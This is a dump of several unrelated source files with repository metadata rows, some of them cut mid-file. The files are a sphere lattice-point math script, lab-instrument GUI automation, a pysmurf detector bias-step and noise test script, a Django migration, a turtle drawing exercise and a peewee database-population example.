|x1-x2|+|y1-y2|+|z1-z2|.
Let C(r) be a sphere with radius r and center in the origin O(0,0,0).
Let I(r) be the set of all points with integer coordinates on the surface of C(r).
Let S(r) be the sum of the Manhattan distances of all elements of I(r) to the origin O.
E.g. S(45)=34518.
Find S(10^10).
Eq. for a sphere:
for center C (q,w,e) and radius r, any point P (x,y,z) is on the sphere, if:
(x-q)^2 + (y-w)^2 + (z-e)^2 = r^2
=> r = sqrt(x**2+y**2+z**2)
in polar coords:
x = r(cos(theta)*sin(phi))
y = r(sin(theta)*sin(phi))
z = r(cos(phi))
'''
def isPointOnSphere(x,y,z,radius):
return (x**2+y**2+z**2 == radius**2)
def Manhattan(x,y,z):
return abs(x) + abs(y) + abs(z)
def AddMan(radius):
points = sorted([Manhattan(x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) for z in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius)])
s = "S(%s) = " % radius
for p in range(0,len(points)):
s += "%s " % points[p]
if p != len(points)-1:
s += "+ "
#print "%s = %s" % (s,sum([Manhattan(x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) for z in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius)]))
print "Count(S(%s)) = %s" % (radius,len(points))
def AddMan_Gen(radius):
return sum(Manhattan(x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) for z in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius))
def PrintPointsAlongEquator(radius):
for z in range(0,radius+1):
l = list(((x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius)))
if len(l)>0:
print "---\nz=%s" % z
print "len(l(%s)) = %s" % (z,len(l))
print l
|
[
"jake_cohen@me.com"
] |
jake_cohen@me.com
|
a6cf71ddbd080f0b5edf96e372e56ba25168cd51
|
0af4b9b6f923ff0978275101a7a88bd4775ad137
|
/functions.py
|
ca062d94b14a7853a2a91aba4b07a07f6117d853
|
[] |
no_license
|
sumukhvaidya/TDCF
|
acbd3e8854b79e854c32084c883156fbb888e402
|
6ce366a7fb7f9875526fd14b33d3f4ebce6ab3f6
|
refs/heads/master
| 2020-04-19T17:28:30.073066
| 2019-04-06T06:54:13
| 2019-04-06T06:54:13
| 168,336,101
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
# Th screen Resolution is 1366x768
import pyautogui
import visa
import time
import numpy as np
from struct import unpack
import csv
#pyautogui.PAUSE=1 #Just a pausing command
def setvoltage(vbase, vpulse, ch):
pyautogui.click(190,70) # Stop the current AFG run
#Double click on Waveform Sequencer for specified channel no
pyautogui.click(100,150+(ch-1)*65)
pyautogui.click(100,150+(ch-1)*65)
# time.delay(0.2)
pyautogui.click(300,230) #Double click waveform properties
pyautogui.click(300,230)
pyautogui.click(960,140) #Setting vpulse
pyautogui.typewrite(str(vpulse),interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(960,175) # Setting vbase
pyautogui.typewrite(str(vbase),interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(780,140) # Setting amplitude
pyautogui.typewrite(str((vpulse-vbase)/2),interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(930,640) # Clicking ok button
pyautogui.click(190,70) # Start the next AFG run
return
def settriggerdelay(t, ch): # t to be set in !NANOSECONDS!
pyautogui.click(190,70) # Stop the current AFG run
#Double click on Setting for specified channel no
pyautogui.click(100,130+(ch-1)*65)
pyautogui.click(100,130+(ch-1)*65)
# time.delay(0.2)
pyautogui.click(700,260) # Click Trigger Delay box
pyautogui.typewrite(str(t),interval=0.1)# Enter time in NANOSECONDS
pyautogui.typewrite('n',interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(900,570) # Clicking ok button
pyautogui.click(190,70) # Start the next AFG run
return
def togglechannel(ch):
pyautogui.click(190,70) # Stop the current AFG run
pyautogui.click(250+(ch-1)*60,70)# Toggle the channel
pyautogui.click(190,70) # Start the next AFG run
return
def savedatacsv(scope, ch, filename):
s=""
scope.write(s.join(('DATA:SOU CH',str(ch)))) #Set Data source Channel
scope.write('DATA:WIDTH 1') # Set Data width
scope.write('DATA:ENC RPB') # Set data encoding
ymult = float(scope.query('WFMPRE:YMULT?')) # Pre-digitising level
yzero = float(scope.query('WFMPRE:YZERO?')) # Offset, if any
yoff = float(scope.query('WFMPRE:YOFF?')) # Related to trace position on screen
xincr = float(scope.query('WFMPRE:XINCR?'))# Time increment in sampling (x axis)
scope.write('CURVE?')
data = scope.read_raw()
headerlen = 2 + int(data[1])
header = data[:headerlen]
ADC_wave = data[headerlen:-1]
ADC_wave = np.array(unpack('%sB' % len(ADC_wave),ADC_wave))
Volts = (ADC_wave - yoff) * ymult + yzero
Time = np.arange(0, xincr * len(Volts), xincr)
savefile=s.join((filename,'.csv'))
with open(savefile,'w') as file:
writer= csv.writer(file, delimiter=',')
#writer.writerow([]) #Repair this row to display the Vpre and Vcoll in the csv file too.
for i in range(0,len(Time)):
if i==0:
writer.writerow(['Time','Volts'])
else:
writer.writerow([str(Time[i]),str(Volts[i])])
return
|
[
"noreply@github.com"
] |
noreply@github.com
|
94b669b4d7fd6a41c17fb8fee0444d3ccd13ebcf
|
d3679511615b126a199fcaf923d9613526a3d41f
|
/chw3k5/checklist/unversioned-yuhan/uxm_bath_iv_noise_biasstep.py
|
2f7f56f6d12ab929aacf83dff9cef4a9953ea2ed
|
[] |
no_license
|
simonsobs/readout-script-dev
|
a00850eb294ca9dea7ba11af3a8af0f7f9404fd5
|
0b002f1477efb6b5fcaddc4a282c35883165a42a
|
refs/heads/master
| 2023-08-07T14:44:42.635388
| 2023-08-01T17:36:44
| 2023-08-01T17:36:44
| 164,685,976
| 1
| 2
| null | 2021-07-27T05:25:44
| 2019-01-08T16:08:13
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 19,011
|
py
|
'''
Code written in Oct 2021 by Yuhan Wang
to be used through OCS
UFM testing script in Pton
takes SC noise, normal noise, IV, (noise and biasstep) at 30,50,70 percent Rn
'''
import matplotlib
matplotlib.use('Agg')
import pysmurf.client
import argparse
import numpy as np
import os
import time
import glob
from sodetlib.det_config import DetConfig
import numpy as np
from scipy.interpolate import interp1d
import argparse
import time
import csv
parser = argparse.ArgumentParser()
parser.add_argument('--slot',type=int)
parser.add_argument('--temp',type=str)
parser.add_argument('--output_file',type=str)
args = parser.parse_args()
slot_num = args.slot
bath_temp = args.temp
out_fn = args.output_file
cfg = DetConfig()
cfg.load_config_files(slot=slot_num)
S = cfg.get_smurf_control()
if slot_num == 2:
fav_tune_files = '/data/smurf_data/tune/1634501972_tune.npy'
if slot_num == 3:
fav_tune_files = '/data/smurf_data/tune/1634492357_tune.npy'
if slot_num == 4:
fav_tune_files = '/data/smurf_data/tune/1634507354_tune.npy'
if slot_num == 5:
fav_tune_files = '/data/smurf_data/tune/1633652773_tune.npy'
S.all_off()
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_mode_dc()
S.load_tune(fav_tune_files)
bands = [0,1,2,3,4,5,6,7]
for band in bands:
print('setting up band {}'.format(band))
S.set_att_dc(band,cfg.dev.bands[band]['dc_att'])
print('band {} dc_att {}'.format(band,S.get_att_dc(band)))
S.set_att_uc(band,cfg.dev.bands[band]['uc_att'])
print('band {} uc_att {}'.format(band,S.get_att_uc(band)))
S.amplitude_scale[band] = cfg.dev.bands[band]['drive']
print('band {} tone power {}'.format(band,S.amplitude_scale[band] ))
print('setting synthesis scale')
# hard coding it for the current fw
S.set_synthesis_scale(band,1)
print('running relock')
S.relock(band,tone_power=cfg.dev.bands[band]['drive'])
S.run_serial_gradient_descent(band);
S.run_serial_eta_scan(band);
print('running tracking setup')
S.set_feedback_enable(band,1)
S.tracking_setup(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], make_plot=False, save_plot=False, show_plot=False, channel=S.which_on(band), nsamp=2**18, lms_freq_hz=None, meas_lms_freq=True,feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
print('checking tracking')
S.check_lock(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], lms_freq_hz=None, feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_filter_disable(0)
S.set_rtm_arb_waveform_enable(0)
S.set_downsample_factor(20)
for bias_index, bias_g in enumerate(bias_groups):
S.set_tes_bias_low_current(bias_g)
bias_v = 0
## SC noise
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_tes_bias_bipolar_array([bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,0,0,0])
time.sleep(120)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
fieldnames = ['bath_temp','bias_voltage', 'bias_line', 'band', 'data_path','type','note']
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = bias_v
row['type'] = 'sc noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
## Normal noise
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 15, cool_wait= 3, high_current_mode=False, overbias_voltage= 5)
## sleep 6 mins to get stablized
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = 20
row['type'] = 'normal noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##IV
bl_iv_list = []
for bias_gp in [0,1,2,3,4,5,6,7,8,9,10,11]:
row = {}
row['bath_temp'] = bath_temp
row['bias_line'] = bias_gp
row['band'] = 'all'
row['bias_voltage'] = 'IV 20 to 0'
row['type'] = 'IV'
print(f'Taking IV on bias line {bias_gp}, all band')
iv_data = S.run_iv(bias_groups = [bias_gp], wait_time=0.001, bias_high=20, bias_low=0, bias_step = 0.025, overbias_voltage=18, cool_wait=0, high_current_mode=False, make_plot=False, save_plot=True, cool_voltage = 18)
dat_file = iv_data[0:-13]+'.npy'
row['data_path'] = dat_file
bl_iv_list.append(dat_file)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#no wave form please
S.set_rtm_arb_waveform_enable(0)
##get target v bias from IV
good_chans = 0
all_data = dict()
for ind, bl in enumerate(bias_groups):
if bl not in all_data.keys():
all_data[bl] = dict()
now = np.load(bl_iv_list[bl], allow_pickle=True).item()
# print(now[3].keys())
# print(now[0].keys())
# print(now[0][0]['R'])
for sb in [0,1,2,3,4,5,6,7]:
try:
if len(now[sb].keys()) != 0:
all_data[bl][sb] = dict()
except:
continue
# print(now[sb].keys())
for chan, d in now[sb].items():
# print(d.keys())
if (d['R'][-1] < 5e-3):
continue
elif len(np.where(d['R'] > 10e-3)[0]) > 0:
continue
# elif len(np.where(d['R'] < -2e-4)[0]) > 10:
# continue
now_chan = len(all_data[bl][sb].keys())
all_data[bl][sb][now_chan] = d
good_chans += 1
##70% Rn first
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.7
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 mins
for i in range(6):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '70 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##50% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.5
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 5 mins
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '50 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##30% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.3
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(30):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(1)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(1)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 mins
for i in range(30):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '30 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#turn filter back on and sample rate into 200Hz
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
|
[
"jlashner@gmail.com"
] |
jlashner@gmail.com
|
8d53e43ebb62761b82dede6505a974d381b4e938
|
28c0bcb13917a277cc6c8f0a34e3bb40e992d9d4
|
/koku/reporting/migrations/0109_remove_ocpusagelineitemdailysummary_pod.py
|
7fc341bdb4450847e431947e91154a91e5a14a73
|
[
"Apache-2.0"
] |
permissive
|
luisfdez/koku
|
43a765f6ba96c2d3b2deda345573e1d97992e22f
|
2979f03fbdd1c20c3abc365a963a1282b426f321
|
refs/heads/main
| 2023-06-22T13:19:34.119984
| 2021-07-20T12:01:35
| 2021-07-20T12:01:35
| 387,807,027
| 0
| 1
|
Apache-2.0
| 2021-07-20T13:50:15
| 2021-07-20T13:50:14
| null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
# Generated by Django 2.2.11 on 2020-03-27 19:21
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting", "0108_auto_20200405_1316")]
operations = [migrations.RemoveField(model_name="ocpusagelineitemdailysummary", name="pod")]
|
[
"noreply@github.com"
] |
noreply@github.com
|
99c123ed63d511ca7431bbe87e9525eb6e64f04c
|
cdae61c9f016b25ace173bca720d85cd06183aee
|
/1_division.py
|
a533f9b1f9ab2441d5a07e943b404844dd2d3c93
|
[] |
no_license
|
OzLievano/Udacity-Python
|
2324cbae9f86e683edd03ccd6d09d71cf1d08168
|
fbadfc730061bf58e69ea4691f39f3d6a56d3b7c
|
refs/heads/master
| 2020-05-16T09:11:55.043076
| 2019-06-17T23:14:32
| 2019-06-17T23:14:32
| 182,939,508
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
import turtle
# Set the number of sides here.
sides = 8
# Set the length of a side here.
length = 80
t = turtle.Turtle()
t.color("orange")
t.back(50)
for side in range(sides):
t.forward(length)
t.right(360/sides)
# On the line above, replace the
# value 72 with an arithmetic
# expression that uses the
# 'sides' variable.
|
[
"Osvaldoalievano@gmail.com"
] |
Osvaldoalievano@gmail.com
|
8b5b8434e2c65cd3680aac20613bb183dde65c4b
|
422dd5d3c48a608b093cbfa92085e95a105a5752
|
/students/rob_sanchez/lesson_07/Department/populate_db.py
|
0d9881181095d243040fe9cb9f12c04cbe6a2320
|
[] |
no_license
|
UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018
|
a2052fdecd187d7dd6dbe6f1387b4f7341623e93
|
b1fea0309b3495b3e1dc167d7029bc9e4b6f00f1
|
refs/heads/master
| 2021-06-07T09:06:21.100330
| 2019-11-08T23:42:42
| 2019-11-08T23:42:42
| 130,731,872
| 4
| 70
| null | 2021-06-01T22:29:19
| 2018-04-23T17:24:22
|
Python
|
UTF-8
|
Python
| false
| false
| 6,729
|
py
|
#!/usr/bin/env python3
"""
Learning persistence with Peewee and sqlite
delete the database to start over
(but running this program does not require it)
"""
import logging
from create_personjob import *
import pprint
from datetime import datetime
def populate_person_data():
"""
add person data to database
"""
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
database = SqliteDatabase('personjob.db')
logger.info('Working with Person class')
PERSON_NAME = 0
LIVES_IN_TOWN = 1
NICKNAME = 2
people = [
('Andrew', 'Sumner', 'Andy'),
('Peter', 'Seattle', None),
('Susan', 'Boston', 'Beannie'),
('Pam', 'Coventry', 'PJ'),
('Steven', 'Colchester', None)
]
logger.info('Creating Person records: iterate through the list of tuples')
try:
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
for person in people:
with database.transaction():
new_person = Person.create(
person_name=person[PERSON_NAME],
lives_in_town=person[LIVES_IN_TOWN],
nickname=person[NICKNAME])
new_person.save()
logger.info('Database add successful')
logger.info('Print the Person records we saved...')
for saved_person in Person:
logger.info(f'{saved_person.person_name} lives in {saved_person.lives_in_town} ' +
f'and likes to be known as {saved_person.nickname}')
except Exception as e:
logger.info(f'Error creating = {person[PERSON_NAME]}')
logger.info(e)
logger.info('See how the database protects our data')
finally:
logger.info('database closes')
database.close()
def populate_department_data():
"""
add department data to database
"""
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
database = SqliteDatabase('personjob.db')
logger.info('Working with Department class')
logger.info('Creating Department records')
DPT_NUMBER = 0
DPT_NAME = 1
DPT_MANAGER = 2
departments = [
('F001', 'Finance', 'Dominic Magee'),
('BU00', 'Business Operations', 'Tamara Burns'),
('BU05', 'Senior Business Analyst', 'Elvin Ryce'),
('AD01', 'Administration', 'Tiana Colby'),
('MG01', 'Management', 'Scott Huston')
]
try:
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
for dpt in departments:
with database.transaction():
new_dpt = Department.create(
dpt_number=dpt[DPT_NUMBER],
dpt_name=dpt[DPT_NAME],
dpt_manager=dpt[DPT_MANAGER])
new_dpt.save()
logger.info('Read and print all Department rows')
for dpt in Department:
logger.info(f'dpt number: {dpt.dpt_number} ' +
f'dpt name: {dpt.dpt_name} ' +
f'dpt manager: {dpt.dpt_manager}')
except Exception as e:
logger.info(f'Error creating = {dpt[DPT_NUMBER]}')
logger.info(e)
finally:
logger.info('database closes')
database.close()
def populate_job_data():
"""
add job data to database
"""
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
database = SqliteDatabase('personjob.db')
logger.info('Working with the Job class')
JOB_NAME = 0
START_DATE = 1
END_DATE = 2
SALARY = 3
PERSON_EMPLOYED = 4
DPT_NUMBER = 5
jobs = [
('Analyst', '2001-09-22', '2003-01-30', 65500, 'Andrew', 'F001'),
('Senior analyst', '2003-02-01', '2006-10-22', 70000, 'Andrew', 'BU00'),
('Senior business analyst', '2006-10-23', '2016-12-24', 80000, 'Andrew', 'BU05'),
